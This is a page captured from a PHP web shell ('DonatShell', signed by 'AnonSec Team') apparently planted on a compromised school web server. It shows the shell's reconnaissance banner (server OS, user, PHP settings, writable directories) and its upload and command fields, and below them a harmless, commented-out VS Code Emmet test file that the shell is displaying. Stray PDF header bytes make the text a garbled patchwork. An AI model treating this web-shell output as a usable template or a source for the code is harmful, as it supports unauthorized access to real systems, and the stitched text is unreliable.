%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : www.kowitt.ac.th  /  Your IP : 216.73.216.118
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Program Files/Microsoft VS Code/resources/app/extensions/emmet/out/test/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Program Files/Microsoft VS Code/resources/app/extensions/emmet/out/test/updateImageSize.test.js
/*---------------------------------------------------------------------------------------------
 *  Copyright (c) Microsoft Corporation. All rights reserved.
 *  Licensed under the MIT License. See License.txt in the project root for license information.
 *--------------------------------------------------------------------------------------------*/
// import 'mocha';
// import * as assert from 'assert';
// import { Selection } from 'vscode';
// import { withRandomFileEditor, closeAllEditors } from './testUtils';
// import { updateImageSize } from '../updateImageSize';
// suite('Tests for Emmet actions on html tags', () => {
// 	teardown(closeAllEditors);
// test('update image css with multiple cursors in css file', () => {
// 	const cssContents = `
// 	.one {
// 		margin: 10px;
// 		padding: 10px;
// 		background-image: url(https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png);
// 	}
// 	.two {
// 		background-image: url(https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png);
// 		height: 42px;
// 	}
// 	.three {
// 		background-image: url(https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png);
// 		width: 42px;
// 	}
// `;
// 	const expectedContents = `
// 	.one {
// 		margin: 10px;
// 		padding: 10px;
// 		background-image: url(https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png);
// 		width: 32px;
// 		height: 32px;
// 	}
// 	.two {
// 		background-image: url(https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png);
// 		width: 32px;
// 		height: 32px;
// 	}
// 	.three {
// 		background-image: url(https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png);
// 		height: 32px;
// 		width: 32px;
// 	}
// `;
// 	return withRandomFileEditor(cssContents, 'css', (editor, doc) => {
// 		editor.selections = [
// 			new Selection(4, 50, 4, 50),
// 			new Selection(7, 50, 7, 50),
// 			new Selection(11, 50, 11, 50)
// 		];
// 		return updateImageSize()!.then(() => {
// 			assert.equal(doc.getText(), expectedContents);
// 			return Promise.resolve();
// 		});
// 	});
// });
// test('update image size in css in html file with multiple cursors', () => {
// 	const htmlWithCssContents = `
// 	<html>
// 		<style>
// 			.one {
// 				margin: 10px;
// 				padding: 10px;
// 				background-image: url(https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png);
// 			}
// 			.two {
// 				background-image: url(https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png);
// 				height: 42px;
// 			}
// 			.three {
// 				background-image: url(https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png);
// 				width: 42px;
// 			}
// 		</style>
// 	</html>
// `;
// 	const expectedContents = `
// 	<html>
// 		<style>
// 			.one {
// 				margin: 10px;
// 				padding: 10px;
// 				background-image: url(https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png);
// 				width: 32px;
// 				height: 32px;
// 			}
// 			.two {
// 				background-image: url(https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png);
// 				width: 32px;
// 				height: 32px;
// 			}
// 			.three {
// 				background-image: url(https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png);
// 				height: 32px;
// 				width: 32px;
// 			}
// 		</style>
// 	</html>
// `;
// 	return withRandomFileEditor(htmlWithCssContents, 'html', (editor, doc) => {
// 		editor.selections = [
// 			new Selection(6, 50, 6, 50),
// 			new Selection(9, 50, 9, 50),
// 			new Selection(13, 50, 13, 50)
// 		];
// 		return updateImageSize()!.then(() => {
// 			assert.equal(doc.getText(), expectedContents);
// 			return Promise.resolve();
// 		});
// 	});
// });
// test('update image size in img tag in html file with multiple cursors', () => {
// 	const htmlwithimgtag = `
// 	<html>
// 		<img id="one" src="https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png" />
// 		<img id="two" src="https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png" width="56" />
// 		<img id="three" src="https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png" height="56" />
// 	</html>
// `;
// 	const expectedContents = `
// 	<html>
// 		<img id="one" src="https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png" width="32" height="32" />
// 		<img id="two" src="https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png" width="32" height="32" />
// 		<img id="three" src="https://github.com/Microsoft/vscode/blob/master/resources/linux/code.png" height="32" width="32" />
// 	</html>
// `;
// 	return withRandomFileEditor(htmlwithimgtag, 'html', (editor, doc) => {
// 		editor.selections = [
// 			new Selection(2, 50, 2, 50),
// 			new Selection(3, 50, 3, 50),
// 			new Selection(4, 50, 4, 50)
// 		];
// 		return updateImageSize()!.then(() => {
// 			assert.equal(doc.getText(), expectedContents);
// 			return Promise.resolve();
// 		});
// 	});
// });
// });

//# sourceMappingURL=https://ticino.blob.core.windows.net/sourcemaps/0f080e5267e829de46638128001aeb7ca2d6d50e/extensions\emmet\out/test\updateImageSize.test.js.map

Anon7 - 2022
AnonSec Team